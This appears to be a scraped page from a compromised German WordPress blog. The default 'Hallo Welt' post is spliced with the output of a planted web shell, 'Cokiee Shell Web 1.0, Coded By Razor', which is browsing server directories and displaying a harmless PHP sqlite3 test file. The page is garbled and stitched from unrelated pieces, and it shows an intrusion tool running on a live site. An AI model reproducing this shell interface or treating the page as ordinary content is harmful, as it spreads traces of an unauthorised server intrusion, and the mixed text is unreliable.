Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/sqlite3/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/sqlite3/tests/bug76665.phpt |
--TEST-- Bug #76665 (SQLite3Stmt::bindValue() with SQLITE3_FLOAT doesn't juggle) --SKIPIF-- <?php if (!extension_loaded('sqlite3')) die('skip sqlite3 extension not available'); ?> --FILE-- <?php $db = new SQLite3(':memory:'); $db->exec("CREATE TABLE foo (bar REAL)"); $stmt = $db->prepare("INSERT INTO foo VALUES (:bar)"); $stmt->bindValue(':bar', 17, SQLITE3_FLOAT); $stmt->execute(); var_dump($db->querySingle("SELECT bar FROM foo LIMIT 1")); ?> ===DONE=== --EXPECT-- float(17) ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare